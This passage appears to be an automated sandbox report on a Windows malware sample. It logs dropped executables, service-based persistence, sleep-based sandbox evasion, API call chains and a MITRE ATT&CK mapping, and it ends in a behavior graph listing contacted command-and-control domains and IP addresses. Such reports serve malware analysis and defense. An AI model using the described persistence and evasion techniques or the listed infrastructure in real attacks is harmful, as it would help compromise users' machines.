Source: C:\Users\user\Desktop\mtuXDnH1Di.exeProcess created: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe "C:\whfkpbh\qbf30bzbv7f7qnhdav.exe"
Source: unknownProcess created: C:\whfkpbh\idtpqzltyfy.exe C:\whfkpbh\idtpqzltyfy.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\whfkpbh\idtpqzltyfy.exeProcess created: C:\whfkpbh\amdrhfskpcu.exe wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeProcess created: C:\whfkpbh\idtpqzltyfy.exe "C:\whfkpbh\idtpqzltyfy.exe"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\whfkpbh\amdrhfskpcu.exeProcess created: C:\whfkpbh\idtpqzltyfy.exe "c:\whfkpbh\idtpqzltyfy.exe"
Source: C:\whfkpbh\idtpqzltyfy.exeProcess created: C:\whfkpbh\amdrhfskpcu.exe wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeProcess created: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe "C:\whfkpbh\qbf30bzbv7f7qnhdav.exe"Jump to behavior
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeProcess created: C:\whfkpbh\idtpqzltyfy.exe "C:\whfkpbh\idtpqzltyfy.exe"Jump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeProcess created: C:\whfkpbh\amdrhfskpcu.exe wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"Jump to behavior
Source: C:\whfkpbh\amdrhfskpcu.exeProcess created: C:\whfkpbh\idtpqzltyfy.exe "c:\whfkpbh\idtpqzltyfy.exe"Jump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeProcess created: C:\whfkpbh\amdrhfskpcu.exe wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"Jump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeSection loaded: wintypes.dllJump to behavior
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeSection loaded: apphelp.dllJump to behavior
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeSection loaded: sspicli.dllJump to behavior
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeSection loaded: userenv.dllJump to behavior
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeSection loaded: profapi.dllJump to behavior
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: apphelp.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: sspicli.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: profapi.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: mswsock.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: napinsp.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: wshbth.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: winrnr.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\whfkpbh\amdrhfskpcu.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: sspicli.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: profapi.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: mswsock.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: napinsp.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: wshbth.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: winrnr.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: rasadhlp.dllJump to behavior
Source: mtuXDnH1Di.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EDA930 GetProcessHeap,LoadLibraryA,GetProcAddress,FreeLibrary,HeapAlloc,FreeLibrary,HeapFree,HeapAlloc,FreeLibrary,HeapFree,FreeLibrary,0_2_00EDA930
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EEE45B push 00000003h; iretd 0_2_00EEE45F
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EECE6F pushad ; ret 0_2_00EECE70
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EECE6A pushad ; ret 0_2_00EECE6B
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009FE45B push 00000003h; iretd 2_2_009FE45F
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009FCE6F pushad ; ret 2_2_009FCE70
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_0016E45B push 00000003h; iretd 3_2_0016E45F
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_0016CE6F pushad ; ret 3_2_0016CE70
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_0016CE6A pushad ; ret 3_2_0016CE6B
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A5E45B push 00000003h; iretd 5_2_00A5E45F
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A5CE6F pushad ; ret 5_2_00A5CE70
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A5CE6A pushad ; ret 5_2_00A5CE6B
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_0016E45B push 00000003h; iretd 6_2_0016E45F
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_0016CE6F pushad ; ret 6_2_0016CE70
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_0016CE6A pushad ; ret 6_2_0016CE6B
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0016E45B push 00000003h; iretd 11_2_0016E45F
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0016CE6F pushad ; ret 11_2_0016CE70
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0016CE6A pushad ; ret 11_2_0016CE6B
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CFE45B push 00000003h; iretd 12_2_00CFE45F
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CFCE6F pushad ; ret 12_2_00CFCE70
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CFCE6A pushad ; ret 12_2_00CFCE6B
Source: mtuXDnH1Di.exeStatic PE information: section name: .text entropy: 6.86562473291782
Source: qbf30bzbv7f7qnhdav.exe.0.drStatic PE information: section name: .text entropy: 6.86562473291782
Source: idtpqzltyfy.exe.2.drStatic PE information: section name: .text entropy: 6.86562473291782
Source: amdrhfskpcu.exe.3.drStatic PE information: section name: .text entropy: 6.86562473291782
Source: C:\whfkpbh\idtpqzltyfy.exeFile created: C:\whfkpbh\amdrhfskpcu.exeJump to dropped file
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeFile created: C:\whfkpbh\idtpqzltyfy.exeJump to dropped file
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeFile created: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeJump to dropped file
Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00ED0500 OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00ED0500
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,CloseServiceHandle,0_2_00ECAF20
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,CloseServiceHandle,2_2_009DAF20
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,CloseServiceHandle,3_2_0014AF20
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,CloseServiceHandle,5_2_00A3AF20
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,CloseServiceHandle,6_2_0014AF20
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,CloseServiceHandle,11_2_0014AF20
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,CloseServiceHandle,12_2_00CDAF20
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: GetProcessHeap,LoadLibraryA,GetProcAddress,FreeLibrary,HeapAlloc,FreeLibrary,GetAdaptersInfo,HeapFree,HeapAlloc,FreeLibrary,GetAdaptersInfo,HeapFree,FreeLibrary,2_2_009EA930
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: GetProcessHeap,LoadLibraryA,GetProcAddress,FreeLibrary,HeapAlloc,FreeLibrary,GetAdaptersInfo,HeapFree,HeapAlloc,FreeLibrary,GetAdaptersInfo,HeapFree,FreeLibrary,3_2_0015A930
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: GetProcessHeap,LoadLibraryA,GetProcAddress,FreeLibrary,HeapAlloc,FreeLibrary,GetAdaptersInfo,HeapFree,HeapAlloc,FreeLibrary,GetAdaptersInfo,HeapFree,FreeLibrary,11_2_0015A930
Source: C:\whfkpbh\amdrhfskpcu.exeWindow / User API: threadDelayed 656Jump to behavior
Source: C:\whfkpbh\amdrhfskpcu.exeWindow / User API: threadDelayed 1220Jump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeWindow / User API: threadDelayed 365Jump to behavior
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-11326
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-11289
Source: C:\whfkpbh\amdrhfskpcu.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_5-11374
Source: C:\whfkpbh\idtpqzltyfy.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-11264
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-9791
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-10024
Source: C:\whfkpbh\idtpqzltyfy.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-10273
Source: C:\whfkpbh\amdrhfskpcu.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-9834
Source: C:\whfkpbh\amdrhfskpcu.exe TID: 7244Thread sleep count: 656 > 30Jump to behavior
Source: C:\whfkpbh\amdrhfskpcu.exe TID: 7244Thread sleep time: -656000s >= -30000sJump to behavior
Source: C:\whfkpbh\amdrhfskpcu.exe TID: 7244Thread sleep count: 1220 > 30Jump to behavior
Source: C:\whfkpbh\amdrhfskpcu.exe TID: 7244Thread sleep time: -1220000s >= -30000sJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exe TID: 7916Thread sleep count: 365 > 30Jump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exe TID: 7916Thread sleep time: -18250000s >= -30000sJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exe TID: 7916Thread sleep time: -50000s >= -30000sJump to behavior
Source: C:\whfkpbh\amdrhfskpcu.exe TID: 7948Thread sleep count: 44 > 30Jump to behavior
Source: C:\whfkpbh\amdrhfskpcu.exe TID: 7948Thread sleep time: -44000s >= -30000sJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeLast function: Thread delayed
Source: C:\whfkpbh\idtpqzltyfy.exeLast function: Thread delayed
Source: C:\whfkpbh\idtpqzltyfy.exeLast function: Thread delayed
Source: C:\whfkpbh\amdrhfskpcu.exeLast function: Thread delayed
Source: C:\whfkpbh\amdrhfskpcu.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EE9580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EE9580
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009F9580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,2_2_009F9580
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_00169580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00169580
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A59580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,5_2_00A59580
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_00169580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,6_2_00169580
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_00169580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,11_2_00169580
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CF9580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,12_2_00CF9580
Source: C:\whfkpbh\idtpqzltyfy.exeThread delayed: delay time: 50000Jump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeThread delayed: delay time: 50000Jump to behavior
Source: idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: idtpqzltyfy.exe, 0000000B.00000002.2532750642.00000000013F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
Source: qbf30bzbv7f7qnhdav.exe, 00000002.00000002.1323006933.000000000129E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2532468063.0000021D46824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeAPI call chain: ExitProcess graph end nodegraph_0-9573
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeAPI call chain: ExitProcess graph end nodegraph_0-9567
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeAPI call chain: ExitProcess graph end nodegraph_0-9585
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeAPI call chain: ExitProcess graph end nodegraph_0-9528
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeAPI call chain: ExitProcess graph end nodegraph_0-9931
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeAPI call chain: ExitProcess graph end nodegraph_0-10308
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeAPI call chain: ExitProcess graph end nodegraph_0-9514
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeAPI call chain: ExitProcess graph end nodegraph_2-9636
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeAPI call chain: ExitProcess graph end nodegraph_2-9619
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeAPI call chain: ExitProcess graph end nodegraph_2-9601
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeAPI call chain: ExitProcess graph end nodegraph_2-9652
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end nodegraph_3-9574
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end nodegraph_3-9550
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end nodegraph_3-9563
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end nodegraph_3-9495
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end nodegraph_3-9509
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end nodegraph_3-9534
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end nodegraph_3-9483
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end nodegraph_5-9623
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end nodegraph_5-9994
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end nodegraph_5-9650
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end nodegraph_5-9587
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end nodegraph_5-9574
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end nodegraph_5-9435
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end nodegraph_5-9606
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end nodegraph_6-9593
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end nodegraph_6-9951
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end nodegraph_6-9583
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end nodegraph_6-9609
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end nodegraph_6-9548
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end nodegraph_6-9565
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\idtpqzltyfy.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\amdrhfskpcu.exeAPI call chain: ExitProcess graph end node
Source: C:\whfkpbh\idtpqzltyfy.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EDA930 GetProcessHeap,LoadLibraryA,GetProcAddress,FreeLibrary,HeapAlloc,FreeLibrary,HeapFree,HeapAlloc,FreeLibrary,HeapFree,FreeLibrary,0_2_00EDA930
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00ECE2C0 GetProcessHeap,RtlAllocateHeap,0_2_00ECE2C0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00ECB7A0 AllocateAndInitializeSid,CheckTokenMembership,0_2_00ECB7A0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EF50E0 GetSystemTime,GetTickCount,0_2_00EF50E0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00ED5200 GetVersionExA,CreateDirectoryA,DeleteFileA,RemoveDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,GetTempPathA,CreateDirectoryA,GetTempPathA,SetFileAttributesA,0_2_00ED5200
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Service Execution		14
Windows Service		14
Windows Service		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Native API		1
DLL Side-Loading		1
Process Injection		11
Virtualization/Sandbox Evasion		LSASS Memory111
Security Software Discovery		Remote Desktop ProtocolData from Removable Media4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		1
Process Injection		Security Account Manager11
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS2
Process Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
System Service Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion		DCSync1
System Network Configuration Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
File and Directory Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow4
System Information Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1488113 Sample: mtuXDnH1Di.exe Startdate: 05/08/2024 Architecture: WINDOWS Score: 88 38 womantrust.net 2->38 40 womaninclude.net 2->40 42 169 other IPs or domains 2->42 50 Antivirus / Scanner detection for submitted sample 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 Machine Learning detection for sample 2->54 56 2 other signatures 2->56 9 idtpqzltyfy.exe 10 2->9         started        14 mtuXDnH1Di.exe 6 2->14         started        16 svchost.exe 2->16         started        18 svchost.exe 2->18         started        signatures3 process4 dnsIp5 44 followfriend.net 188.225.40.227, 49718, 80 TIMEWEB-ASRU Russian Federation 9->44 46 womanbelieve.net 15.197.142.173, 49703, 80 TANDEMUS United States 9->46 48 10 other IPs or domains 9->48 34 C:\whfkpbh\amdrhfskpcu.exe, PE32 9->34 dropped 64 Antivirus detection for dropped file 9->64 66 Multi AV Scanner detection for dropped file 9->66 68 Machine Learning detection for dropped file 9->68 20 amdrhfskpcu.exe 4 9->20         started        36 